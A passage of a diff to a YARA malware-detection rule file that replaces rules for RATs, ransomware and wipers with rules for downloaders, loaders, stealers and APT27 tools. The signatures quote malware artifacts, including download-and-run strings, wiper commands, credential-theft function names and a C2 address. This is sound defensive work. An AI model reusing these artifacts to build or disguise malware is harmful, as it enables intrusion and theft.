($s*) or all of ($m*) or (2 of ($m*) and 4 of ($s*)) + uint16(0)==0x5a4d and all of ($x*) and 2 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Horuseyesrat : FILE +rule DITEKSHEN_MALWARE_Win_Karkoff : FILE { meta: - description = "Detects HorusEyesRAT" + description = "Detects Karkoff" author = "ditekSHen" - id = "80b2fd11-f8b4-5aee-b55a-4f7ee9fad6cf" - date = "2024-09-06" - modified = "2024-09-06" + id = "7d2fe783-18b3-5d84-a9b5-e8e0b5a0db98" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7435-L7451" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c0f499e3a17923b391ed6b7fa723525a9d4aef0ce04a2c7abec60d5eda15888f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5298-L5313" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e9b6ba5be2b3cd0faa898347e57cee5a57b80b19842c3a1ddb42d620307c8b39" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $x1 = "\\HorusEyesRat-" ascii - $x2 = "\\HorusEyesRat.pdb" ascii - $x3 = "get_horus_eye" ascii - $s1 = "get_Type_Packet" fullword ascii - $s2 = "PacketLib" fullword ascii nocase - $s3 = "System.Net.Sockets" fullword ascii - $s4 = "PROCESS_MODE_BACKGROUND_BEGIN" fullword ascii - $s5 = "EXECUTION_STATE" fullword ascii - $s6 = /Plugins\\[A-Z]{2}.dll/ fullword wide + $x1 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide + $x2 = "CMD.exe" fullword wide + $x3 = "Karkoff.ProjectInstaller.resources" fullword ascii + $s1 = /try\shttp(s)?\s(ip|domain)/ fullword wide + $s2 = "Reg cleaned!" fullword wide nocase + $s3 = "Content-Disposition: form-data; name=\"{1}\"" fullword wide + $s4 = "^[A-Fa-f0-9]{8}-([A-Fa-f0-9]{4}-){3}[A-Fa-f0-9]{12}$" fullword wide + $s5 = "new backdoor" fullword wide condition: - uint16(0)==0x5a4d and (2 of ($x*) or (1 of ($x*) and 3 of ($s*)) or (4 of ($s*) and #s6>4)) + uint16(0)==0x5a4d and ( all of ($x*) or 4 of ($s*) or (2 of ($x*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Breakwin : FILE +rule DITEKSHEN_MALWARE_Win_Dlagent09 : FILE { meta: - description = "Detects BreakWin Wiper" + description = "Detects known downloader agent" author = "ditekSHen" - id = "4ffadbfa-c1cc-59e6-a9ba-7a34eca6c3fe" - date = "2024-09-06" - modified = "2024-09-06" + id = "90f71ac7-19d9-5a8e-9830-df2f16e12c9b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7453-L7471" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "86fc89e28fc107c2d4fe98dc16048d9e076b1fef53a3df0814f80a88bbe09c48" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5315-L5328" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9336507fa4bb9d3a6325d5e9caafc8c4e816a0166fded7d4e53e09a87628bc89" score = 75 - quality = 75 + quality = 71 tags = "FILE" strings: - $s1 = "Started wiping file %s with %s." fullword wide - $s2 = "C:\\Program Files\\Lock My PC" wide - $s3 = "Stardust is still alive." fullword wide - $s4 = "Failed to terminate the locker process." fullword wide - $s5 = "C:\\Windows\\System32\\cmd.exe" fullword wide - $s6 = "Process created successfully. Executed command: %s." fullword wide - $s7 = "locker_background_image_path" fullword ascii - $s8 = "takeown.exe /F \"C:\\Windows\\Web\\Screen\" /R /A /D Y" fullword ascii - $s9 = "icacls.exe \"C:\\Windows\\Web\\Screen\" /reset /T" fullword ascii - $s10 = "takeown.exe /F \"C:\\ProgramData\\Microsoft\\Windows\\SystemData\" /R /A /D Y" fullword ascii - $s11 = ".?AVProcessSnapshotCreationFailedException@@" fullword ascii + $h1 = "//:ptth" ascii wide nocase + $h2 = "//:sptth" ascii wide nocase + $s1 = "DownloadString" fullword ascii wide + $s2 = "StrReverse" fullword ascii wide + $s3 = "FromBase64String" fullword ascii wide + $s4 = "WebClient" fullword ascii wide condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and (1 of ($h*) and all of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Coinminer03 : FILE +rule DITEKSHEN_MALWARE_Win_Coinminingbot : FILE { meta: - description = "Detects coinmining malware" + description = "Detects coinmining bot" author = "ditekSHen" - id = "e0e57557-7c46-5336-b904-c4c1f142bd81" - date = "2024-09-06" - modified = "2024-09-06" + id = "df15bfbd-f531-5eaa-b160-ad8a1fbe992f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7506-L7528" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f22e1af955a0d132dda820fe5e5e1ae2f077b7264ce1f0125a2f37c0da6b6508" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5330-L5343" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a307a6c9184e8f4068cfa89a8432ae017c8aab10b706ba065051f8749860c15c" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "UnVzc2lhbiBTdGFuZGFyZCBUaW1l" wide - $s2 = "/xmrig" wide - $s3 = "/gminer" wide - $s4 = "-o {0} -u {1} -p {2} -k --cpu-priority 0 --threads={3}" wide - $s5 = "--algo ethash --server" wide - $s6 = "--algo kawpow --server" wide - $cnc1 = "/delonl.php?hwid=" fullword wide - $cnc2 = "/gateonl.php?hwid=" fullword wide - $cnc3 = "&cpuname=" fullword wide - $cnc4 = "&gpuname=" fullword wide - $cnc5 = "{0}/gate.php?hwid={1}&os={2}&cpu={3}&gpu={4}&dateinstall={5}&gpumem={6}" fullword wide - $cnc6 = "/del.php?hwid=" fullword wide - $f1 = "<StartGpuethGminer>b__" ascii - $f2 = "<StartGpuetcGminer>b__" ascii - $f3 = "<StartGpurvnGminer>b__" ascii + $s1 = "FullScreenDetect" fullword ascii + $s2 = "GetChildProcesses" fullword ascii + $s3 = "HideBotPath" fullword ascii + $s4 = "Inject" fullword ascii + $s5 = "DownloadFile" fullword ascii + $s6 = "/Data/GetUpdateInfo" wide condition: - uint16(0)==0x5a4d and (3 of ($cnc*) or (2 of ($f*) and (1 of ($s*) or 1 of ($f*))) or all of ($f*) or 5 of ($s*)) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Zeppelin : FILE +rule DITEKSHEN_MALWARE_Win_Fyanti : FILE { meta: - description = "Detects Zeppelin (Delphi) ransomware" + description = "Hunt for FYAnti third-stage loader DLLs" author = "ditekSHen" - id = "368d0c31-745d-50ad-a265-50561fdc822a" - date = "2024-09-06" - modified = "2024-09-06" + id = "7a1f913c-d83f-50e9-943c-246c4c71c654" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7530-L7545" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f6c8420756b562662985dd26eaad58500a24cae786a47b788c953e86276116a1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5345-L5351" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "baaeef0b1452d7ea41ffaaff592cac2c5e16f921dbbfb3a300a63e69f134e9d0" score = 75 quality = 75 tags = "FILE" + condition: + uint16(0)==0x5a4d and pe.is_dll() and pe.exports("FuckYouAnti") +} +import "pe" + +rule DITEKSHEN_MALWARE_Win_Dlagent10 : FILE +{ + meta: + description = "Detects known downloader agent" + author = "ditekSHen" + id = "b5807adf-9d15-5e08-97fb-a529acb1c1eb" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5353-L5364" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "74647b39331727000608bc89b30189d802e62d59876659d4477deb4da2fcfe13" + score = 75 + quality = 67 + tags = "FILE" + strings: - $s1 = "TUnlockAndEncrypt" ascii - $s2 = "TExcludeFiles" ascii - $s3 = "TExcludeFolders" ascii - $s4 = "TDrivesAndShares" ascii - $s5 = "TTaskKiller" ascii - $x1 = "!!! D !!!" ascii - $x2 = "!!! LOCALPUBKEY !!!" ascii - $x3 = "!!! ENCLOCALPRIVKEY !!!" ascii + $s1 = "powershell.exe" ascii wide nocase + $s2 = ".DownloadFile(" ascii wide nocase + $s3 = "_UseShellExecute" ascii wide nocase + $s4 = "_CreateNoWindow" ascii wide nocase condition: - uint16(0)==0x5a4d and ( all of ($s*) or all of ($x*) or (2 of ($x*) and 2 of ($s*))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Slackbot : FILE +rule DITEKSHEN_MALWARE_Win_Pureloader : FILE { meta: - description = "Detects SlackBot" + description = "Detects Pure loader / injector" author = "ditekSHen" - id = "cd540aa2-dc8f-5ccc-b66c-a8d72b73c896" - date = "2024-09-06" - modified = "2024-09-06" + id = "ad44a12a-4ac7-5cc7-92ab-13c23514de69" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7547-L7588" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "919839883c437b69cf7f380830f2499be24415f96f1e42424e4859114f958581" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5366-L5382" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1f0bd20e769ea79d28d6e60ca06aa8aa2b3436426cfe0cd4f2023a08236875cd" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $x1 = "lp0o4bot v" ascii - $x2 = "slackbot " ascii - $s1 = "cpu: %lumhz %s, uptime: %u+%.2u:%.2u, os: %s" fullword ascii - $s2 = "%s, running for %u+%.2u:%.2u" fullword ascii - $s3 = "PONG :%s" fullword ascii - $s4 = "PRIVMSG %s :%s" fullword ascii - $s5 = "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" fullword ascii - $m1 = "saving %s to %s" ascii - $m2 = "visit number %u failed" ascii - $m3 = "sending %s packets of %s bytes to %s with a delay of %s" ascii - $m4 = "file executed" ascii - $m5 = "packets sent" ascii - $m6 = "upgrading to %s" ascii - $m7 = "rebooting..." ascii - $c1 = "!@remove" fullword ascii - $c2 = "!@restart" fullword ascii - $c3 = "!@reboot" fullword ascii - $c4 = "!@rndnick" fullword ascii - $c5 = "!@exit" fullword ascii - $c6 = "!@sysinfo" fullword ascii - $c7 = "!@upgrade" fullword ascii - $c8 = "!@login" fullword ascii - $c9 = "!@run" fullword ascii - $c10 = "!@webdl" fullword ascii - $c11 = "!@cycle" fullword ascii - $c12 = "!@clone" fullword ascii - $c13 = "!@visit" fullword ascii - $c14 = "!@udp" fullword ascii - $c15 = "!@nick" fullword ascii - $c16 = "!@say" fullword ascii - $c17 = "!@quit" fullword ascii - $c18 = "!@part" fullword ascii - $c19 = "!@join" fullword ascii - $c20 = "!@raw" fullword ascii + $s1 = "InvokeMember" fullword wide + $s2 = "ConcatProducer" fullword wide + $s3 = ".Classes.Resolver" wide + $s4 = "get_DLL" fullword ascii + $s5 = "BufferedStream" fullword ascii + $s6 = "GZipStream" fullword ascii + $s7 = "MemoryStream" fullword ascii + $s8 = "Decompress" fullword ascii + $s9 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii condition: - uint16(0)==0x5a4d and ( all of ($x*) or all of ($s*) or all of ($m*) or (10 of ($c*) and (1 of ($x*) or 3 of ($s*) or 2 of ($m*)))) + uint16(0)==0x5a4d and 8 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Sweetystealer : FILE +rule DITEKSHEN_MALWARE_Win_VBS_Dlagent01 { meta: - description = "Detects SweetyStealer" + description = "Detects VBS MSHTA downloader" author = "ditekSHen" - id = "21dd1706-2cb5-5b27-ad3a-c3de8e6fb333" - date = "2024-09-06" - modified = "2024-09-06" + id = "447ea323-ecab-5f6b-b13e-0690254c754e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7590-L7608" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ecf22240b47af077055260faba0406721f1b4cc5ed04180285df0de86c4e1241" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5384-L5395" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0e47839a55773764aca0aebcf1078c06c729b86d1e2f18d7d64e3bb11e87f3eb" score = 75 quality = 75 - tags = "FILE" + tags = "" strings: - $s1 = "SWEETY STEALER" wide - $s2 = "\\SWEETYLOG.zip" fullword wide - $s3 = "\\SWEETY STEALER\\SWEETY\\" ascii - $s4 = "\\Sweety" fullword wide - $s5 = "SWEETYSTEALER." ascii - $s6 = "in Virtual Environment, so we prevented stealing" wide - $s7 = ":purple_square:" wide - $f1 = "<GetDomainDetect>b__" ascii - $f2 = "<GetAllProfiles>b__" ascii - $f3 = "<ProcessExtraFieldZip64>b__" ascii - $f4 = "<PostExtractCommandLine>k__" ascii + $s1 = "llehS.tpircsW" ascii + $s2 = ".Run" ascii + $s3 = "mshta http" ascii nocase + $s4 = "StrReverse" ascii condition: - uint16(0)==0x5a4d and 3 of ($s*) or (3 of ($f*) and 1 of ($s*)) + all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Genircbot : FILE +rule DITEKSHEN_MALWARE_Win_Ranumbot : FILE { meta: - description = "Detects generic IRCBots" + description = "Detects RanumBot / Windigo / GoStealer" author = "ditekSHen" - id = "e1faa1dd-bbf5-5208-97d6-a6e8597d39bc" - date = "2024-09-06" - modified = "2024-09-06" + id = "26a0832e-8a39-5a0e-bd39-710744212c16" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7610-L7626" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "cc7f4599148c45fdf755c07530ae4846b7e283b5c1001c121f9ea05279997dc1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5397-L5430" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a9c32445e62d072e4184d25497696ef6225edb176dc7a9743a54194d4ddb4b0c" score = 75 quality = 73 tags = "FILE" strings: - $s1 = "@login" ascii nocase - $s2 = "PRIVMSG" fullword ascii - $s3 = "JOIN" fullword ascii - $s4 = "PING :" fullword ascii - $s5 = "NICK" fullword ascii - $s6 = "USER" fullword ascii - $x1 = "irc.danger.net" fullword ascii nocase - $x2 = "evilBot" fullword ascii nocase - $x3 = "#evilChannel" fullword ascii nocase + $f1 = "main.addSchedulerTaskSSH" fullword ascii + $f2 = "main.attackRouter" fullword ascii + $f3 = "main.decryptPassword" fullword ascii + $f4 = "main.handleScanRequest" fullword ascii + $f5 = "main.scanNetwork" fullword ascii + $f6 = "main.extractCredentials" fullword ascii + $s1 = "H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s/16%s:%d%s:22+0330+0430+0530+0545+0630+0845+10" ascii + $s2 = "<== as at fp= is lr: of on pc= sp: sp=) = ) m=+Inf, n -Inf00%x112212343125: p=ABRTACDTACSTAEDTAESTAKDTAKSTALRMAWSTAhomAtoiCESTChamDashEESTGOGCJulyJuneKILLLEAFLisuMiaoModiNZDTNZSTNewaPIPEQUITSASTSEGVTERMThai" ascii + $s3 = "W*struct { P *big.Int; Q *big.Int; G *big.Int; Y *big.Int; Rest []uint8 \"ssh:\\\"rest\\\"\" }" ascii + $s4 = "policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write" ascii + $s5 = "/Users/alexander/go/src/mikrotik/winbox.go" ascii + $xf1 = "main.readConfig" fullword ascii + $xf2 = "main.ensureRunningAsUser" fullword ascii + $xf3 = "main.configRegPath" fullword ascii + $xf4 = "main.oldConfigRegPath" fullword ascii + $uf1 = "main.locateChrome" fullword ascii + $uf2 = "main.decryptAndUploadProfile" fullword ascii + $uf3 = "main.decryptCookies" fullword ascii + $uf4 = "main.extractPasswords" fullword ascii + $uf5 = "main.getFirefoxProfile" fullword ascii + $uf6 = "main.postBrowsersData" fullword ascii + $uf7 = "main.uploadFirefoxProfile" fullword ascii + $uf8 = "main.zipFirefoxProfile" fullword ascii + $uf9 = /main\.detect(Browsers|Chrome|Coccoc|Edge|Firefox|InternetExplorer|Opera|Yandex)/ fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or 2 of ($x*)) + uint16(0)==0x5a4d and (5 of ($f*) or 4 of ($s*) or (2 of ($f*) and 2 of ($s*)) or ( all of ($xf*) and 1 of ($uf*)) or 6 of ($uf*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Nitro : FILE +rule DITEKSHEN_MALWARE_Win_Dllhijacker01 : FILE { meta: - description = "Detects Nitro Ransomware" + description = "Hunt for VSNTAR21 / DllHijacker01 IronTiger / LuckyMouse / APT27 malware" author = "ditekSHen" - id = "3edb62e0-0544-5291-a949-a45fdf881c7e" - date = "2024-09-06" - modified = "2024-09-06" + id = "0a858058-310a-5b1c-a6fe-abdec7b25abe" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7628-L7652" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "03da21ece2de530a9c2ba08a9e44c9a92bc9ca0a6d4ac9507899d1f3dcd03e37" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5432-L5448" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "48535c0bb5342e2f91ac9d015c761d8d543b122dd3cc08b7029631fcf3037bfb" score = 75 - quality = 69 + quality = 75 tags = "FILE" strings: - $x1 = ".givemenitro" wide - $x2 = "Nitro Ransomware" ascii wide - $x3 = "\\NitroRansomware.pdb" ascii - $x4 = "NitroRansomware" ascii wide nocase - $s1 = "Valid nitro code was received" wide - $s2 = "discord nitro" ascii wide nocase - $s3 = "Starting file encryption" wide - $s4 = "NR_decrypt.txt" wide - $s5 = "open it unless you have the decryption key." ascii - $s6 = "<EncryptAll>b__" ascii - $s7 = "<DecryptAll>b__" ascii - $s8 = "DECRYPT_PASSWORD" fullword ascii - $s9 = "IsEncrypted" fullword ascii - $s10 = "CmdProcess_OutputDataReceived" fullword ascii - $s11 = "encryptedFileLog" fullword ascii - $s12 = "Encrypting:" fullword wide - $s13 = "decryption key. If you do so, your files may get corrupted" ascii + $s1 = "libvlc_add_intf" fullword ascii + $s2 = "libvlc_dllonexit" fullword ascii + $s3 = "libvlc_getmainargs" fullword ascii + $s4 = "libvlc_initenv" fullword ascii + $s5 = "libvlc_set_app_id" fullword ascii + $s6 = "libvlc_set_app_type" fullword ascii + $s7 = "libvlc_set_user_agent" fullword ascii + $s8 = "libvlc_wait" fullword ascii + $s9 = "dll.dll" fullword ascii condition: - uint16(0)==0x5a4d and (3 of ($x*) or (3 of ($s*) and 1 of ($x*)) or (7 of ($s*))) + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Nanocore : FILE +rule DITEKSHEN_MALWARE_Win_Hyperbro02 : FILE { meta: - description = "Detects NanoCore" + description = "Detects HyperBro IronTiger / LuckyMouse / APT27 malware" author = "ditekSHen" - id = "931b98f6-df2b-538b-bc49-ecbbd24334da" - date = "2024-09-06" - modified = "2024-09-06" + id = "1880afd7-ca06-5b43-af8f-e791ded0d7d8" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7654-L7681" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "6336260e0af2b4b51338ee066f41b7c58aa134a6c03ca110db7e088edf2b65a7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5450-L5474" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ca4ee116516549fc42f7e32b3c24d631b7f2c638efbde5c07227358e78fd6f35" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "NanoCore Client" fullword ascii - $x2 = "NanoCore.ClientPlugin" fullword ascii - $x3 = "NanoCore.ClientPluginHost" fullword ascii - $i1 = "IClientApp" fullword ascii - $i2 = "IClientData" fullword ascii - $i3 = "IClientNetwork" fullword ascii - $i4 = "IClientAppHost" fullword ascii - $i5 = "IClientDataHost" fullword ascii - $i6 = "IClientLoggingHost" fullword ascii - $i7 = "IClientNetworkHost" fullword ascii - $i8 = "IClientUIHost" fullword ascii - $i9 = "IClientNameObjectCollection" fullword ascii - $i10 = "IClientReadOnlyNameObjectCollection" fullword ascii - $s1 = "ClientPlugin" fullword ascii - $s2 = "EndPoint" fullword ascii - $s3 = "IPAddress" fullword ascii - $s4 = "IPEndPoint" fullword ascii - $s5 = "IPHostEntr" fullword ascii - $s6 = "get_ClientSettings" fullword ascii - $s7 = "get_Connected" fullword ascii + $s1 = "\\cmd.exe /A" fullword wide + $s2 = "C:\\windows\\explorer.exe" fullword wide + $s3 = "\\\\.\\pipe\\testpipe" fullword wide + $s4 = "Elevation:Administrator!new:{" wide + $s5 = "log.log" fullword wide + $s6 = "%s\\%d.exe" fullword wide + $s7 = ".?AVTPipeProtocol@@" fullword ascii + $s8 = ".?AVTCaptureMgr@@" fullword ascii + $s9 = "system-%d" fullword wide + $s10 = "[test] %02d:%02d:%02d:%03d %s" fullword wide + $s11 = "\\..\\data.dat" fullword wide + $s12 = "\\..\\config.ini" fullword wide + $s13 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 77 00 6f 00 72 00 6b 00 65 00 72 00 } + $s14 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 64 00 61 00 65 00 6d 00 6f 00 6e 00 } + $cnc1 = "https://%s:%d/ajax" fullword wide + $cnc2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" fullword wide + $cnc3 = "139.180.208.225" fullword wide condition: - uint16(0)==0x5a4d and (2 of ($x*) or 8 of ($i*) or all of ($s*) or (1 of ($x*) and (3 of ($i*) or 2 of ($s*)))) + uint16(0)==0x5a4d and (7 of ($s*) or (2 of ($cnc*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Satan : FILE +rule DITEKSHEN_MALWARE_Win_Dllhijacker02 : FILE { meta: - description = "Detects Satan ransomware" + description = "Detects ServiceCrt / DllHijacker03 IronTiger / LuckyMouse / APT27 malware" author = "ditekSHen" - id = "f0a9369e-a3d7-5770-b490-4c9a919abb82" - date = "2024-09-06" - modified = "2024-09-06" + id = "de5eee06-570a-5ec3-9e1b-13de4c4f260f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7683-L7709" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e50daa88e0067a0f00329c6369c0334bd282fb102c91ba5ca770da97851d6d2e" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5512-L5527" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d4eb236256c413d4d3223cc897783f5631c7798c0f3280e72d8c8504438fcaf9" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $s1 = "S:(ML;;NRNWNX;;;LW)" fullword wide - $s2 = "recycle.bin" fullword wide - $s3 = "tmp_" fullword wide - $s4 = "%s%08x.%s" fullword wide - $s5 = "\"%s\" %s" fullword wide - $s6 = "/c \"%s\"" fullword wide - $s7 = "Global\\" fullword wide - $s8 = "rd /S /Q \"%s\"" fullword ascii - $s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)" fullword ascii - $e1 = "*pdf*" fullword wide - $e2 = "*rtf*" fullword wide - $e3 = "*doc*" fullword wide - $e4 = "*docx*" fullword wide - $e5 = "*xlsx*" fullword wide - $e6 = "*pptx*" fullword wide - $e7 = "*moneywell*" fullword wide - $o1 = { 56 8d 54 24 34 b9 9e f0 ea be e8 c1 f9 ff ff 8d } - $o2 = { b9 34 f6 40 00 e8 ea 0b 00 00 85 c0 0f 84 91 } - $o3 = { 53 8d 84 24 34 01 00 00 b9 01 00 00 80 50 a1 64 } + $s1 = "ServiceCrtMain" fullword ascii + $s2 = "mpsvc.dll" fullword ascii + $o1 = { 84 db 0f 85 4c ff ff ff e8 14 06 00 00 8b f0 83 } + $o2 = { f7 c1 00 ff ff ff 75 c5 eb 13 0f ba 25 10 20 01 } + $o3 = { 8d 04 b1 8b d9 89 45 fc 8d 34 b9 a1 18 20 01 10 } + $o4 = { b0 01 c3 68 b8 2c 01 10 e8 83 ff ff ff c7 04 24 } + $o5 = { eb 34 66 0f 12 0d 00 fe 00 10 f2 0f 59 c1 ba cc } + $o6 = { 73 c7 dc 0d 4c ff 00 10 eb bf dd 05 34 ff 00 10 } condition: - uint16(0)==0x5a4d and ((8 of ($s*) and 4 of ($e*)) or all of ($s*) or ( all of ($e*) and 5 of ($s*)) or ( all of ($o*) and 8 of them )) + uint16(0)==0x5a4d and all of ($s*) and 5 of ($o*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Neshta : FILE +rule DITEKSHEN_MALWARE_Win_Zeoticus : FILE { meta: - description = "Detects Neshta" + description = "Detects Zeoticus ransomware" author = "ditekSHen" - id = "b96ee19e-b631-57fd-bf8a-67d790202c46" - date = "2024-09-06" - modified = "2024-09-06" + id = "6d1096dd-d075-54eb-ade9-48e2f945145d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7711-L7720" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7967c1154f652e28e541058a7b7f61aa077cfaf6be58282e1de68d9a6088c1ac" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5529-L5549" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "588c140c141e82dae56758550549dfb96410db50521ac546477e1adc5575b4a0" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Delphi-the best. Fuck off all the rest. Neshta 